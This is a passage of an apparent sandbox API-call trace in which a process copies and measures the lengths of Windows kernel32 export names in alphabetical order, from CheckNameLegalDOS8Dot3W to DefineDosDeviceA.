lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.576] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.576] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.576] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.576] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.576] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.576] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.576] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.576] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.576] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.576] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.576] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.576] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.576] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.576] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.577] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.577] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.577] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.577] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.577] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.577] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.577] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.577] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.577] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.577] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.577] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.577] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.577] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.577] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.577] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.577] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.577] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.577] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.577] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.578] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.578] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.578] lstrlenA (lpString="COPYFILEA") returned 9 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.578] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.578] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.578] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.578] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.578] lstrlenA (lpString="COPYFILEW") returned 9 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.578] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.578] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.578] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.578] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.578] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.578] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.578] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.578] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.578] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.578] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.579] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.579] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.579] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.579] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.579] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.579] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.579] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.579] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.579] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.579] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.579] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.579] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.579] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.579] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.579] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.579] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.579] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.579] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.579] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.580] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.580] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.580] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.580] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.580] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.580] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.580] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.580] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.580] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.580] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.580] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.580] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.580] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.580] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.580] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.580] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.580] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.580] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.581] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.581] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.581] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.581] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.581] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.581] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.581] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.581] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.581] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.581] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.581] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.581] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.581] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.581] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.581] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.581] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.581] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.581] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.581] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.582] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.582] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.582] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.582] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.582] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.582] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.582] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.582] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.582] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.582] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.582] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.582] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.582] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.582] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.582] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.582] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.582] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.582] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.583] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.583] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.583] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 